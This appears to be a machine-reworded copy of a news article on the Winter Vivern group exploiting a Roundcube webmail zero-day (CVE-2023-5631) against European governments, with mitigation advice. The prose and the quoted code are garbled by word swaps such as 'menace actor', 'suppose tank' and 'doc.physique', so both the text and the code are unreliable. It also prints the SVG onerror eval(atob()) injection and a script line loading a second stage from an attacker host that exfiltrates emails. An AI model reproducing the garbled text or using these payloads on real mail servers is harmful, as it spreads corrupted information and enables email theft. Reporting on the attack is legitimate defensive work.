After studying the technical particulars about this zero-day that focused governmental entities and a suppose tank in Europe and studying concerning the Winter Vivern menace actor, get recommendations on mitigating this cybersecurity assault.
ESET researcher Matthieu Faou has uncovered a brand new cyberattack from a cyberespionage menace actor referred to as Winter Vivern, whose pursuits align with Russia and Belarus. The assault focuses on exploiting a zero-day vulnerability in Roundcube webmail, with the consequence being the flexibility to listing folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity firm ESET famous the marketing campaign has focused governmental entities and a suppose tank in Europe.
Bounce to:
Technical particulars about this cyberattack exploiting a 0day in Roundcube
The menace actor begins the assault by sending a specifically crafted e mail message with the topic line “Get began in your Outlook” and coming from “group.administration@outlook(.)com” (Determine A).
Determine A
On the finish of the e-mail, a SVG tag comprises a base64-encoded malicious payload; that is hidden for the consumer however current within the HTML supply code. As soon as decoded, the malicious content material is:
<svg id="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" xmlns="http://www.w3.org/2000/svg"> <picture href="https://www.techrepublic.com/article/winter-vivern-exploits-zero-day-roundcube-webmail/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>
The aim of the malicious code is to set off the onerror attribute by utilizing an invalid URL within the x parameter.
Decoding the payload within the onerror attribute leads to a line of JavaScript code that can be executed within the sufferer’s browser within the context of the consumer’s Roundcube session:
var fe=doc.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
doc.physique.appendChild(fe);
The JavaScript injection labored on absolutely patched Roundcube situations on the time of Faou’s discovery. The researcher may set up that this zero-day vulnerability was positioned within the server-side script rcube_washtml.php, which didn’t ” … correctly sanitize the malicious SVG doc earlier than being added to the HTML web page interpreted by a Roundcube consumer,” as said by Faou.
The vulnerability doesn’t want any interplay with the consumer aside from viewing the message in an internet browser, which possibly explains why the menace actor didn’t want to make use of a really difficult social engineering method; any content material considered triggers the exploit.
After this preliminary execution of JavaScript code, a second-stage loader, additionally developed in JavaScript and named checkupdate.js, is being executed and triggers the ultimate stage, as soon as once more written in JavaScript (Determine B).
Determine B
The ultimate payload supplies the potential for the attacker to listing all folders and emails within the present Roundcube e mail account along with exfiltrate e mail messages to a command and management server through HTTP requests.
When TechRepublic requested Faou about additional compromise of the system, he replied through a written message: “We haven’t noticed any lateral motion. The JavaScript code is simply executed within the context of (the) sufferer’s browser, within the Roundcube window. So it doesn’t have entry to the backend of Roundcube and escaping the browser would require a far more difficult exploit. Nonetheless, they might re-use their entry to launch additional phishing campaigns originating from the sender who was compromised (we haven’t noticed this).”
Who’s Winter Vivern?
Winter Vivern, aka TA473, is a cyberespionage menace actor whose pursuits are carefully aligned with the governments of Russia and Belarus. The first public publicity of the Winter Vivern menace actor occurred in 2021 when it focused a number of governmental entities in several nations together with Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.
This menace actor has a historical past of exploiting webmail software program, because it already abused older Roundcube vulnerabilities and identified Zimbra webmail vulnerabilities to focus on elected officers and staffers within the U.S. in addition to consultants in European politics and economics. The menace actor additionally focused mailboxes from NATO-aligned authorities entities in Europe.
The menace actor usually makes use of malicious paperwork and generally a PowerShell backdoor to efficiently compromise its targets. Winter Vivern makes use of vulnerability scanners similar to Acunetix in all probability to scan focused networks.
ESET famous that Winter Vivern has been noticed exploiting CVE-2020-35730, which is a identified Roundcube vulnerability towards entities which can be additionally focused by menace actor APT28, which has been described because the navy unit 26165 of Russia’s Navy Intelligence Company, beforehand referred to as GRU.
As well as, ESET identified a doable hyperlink to menace actor MoustachedBouncer, who runs assaults towards overseas diplomats in Belarus. Requested about it, Faou instructed TechRepublic that “there are fairly distinctive similarities within the community infrastructure of each teams, suggesting {that a} widespread entity may present it to each of them.”
As said by ESET, relating to the present menace, “Regardless of the low sophistication of the group’s toolset, it’s a menace to governments in Europe due to its persistence, very common working of phishing campaigns, and since a major variety of internet-facing purposes aren’t usually up to date though they’re identified to comprise vulnerabilities.”
How you can shield customers from this cybersecurity menace
ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and launched safety updates to deal with the vulnerability on Oct. 16, 2023 for variations 1.6.4, 1.4.15 and 1.5.5. It’s strongly suggested to patch Roundcube for this vulnerability.
It’s really helpful to maintain all working techniques and software program updated and patched to keep away from additional compromise that might occur through widespread vulnerabilities.
Disabling JavaScript execution within the browser would mitigate this menace, but it could vastly scale back the consumer’s expertise as a result of plenty of web sites closely depend on JavaScript to operate.
Disclosure: I work for Pattern Micro, however the views expressed on this article are mine.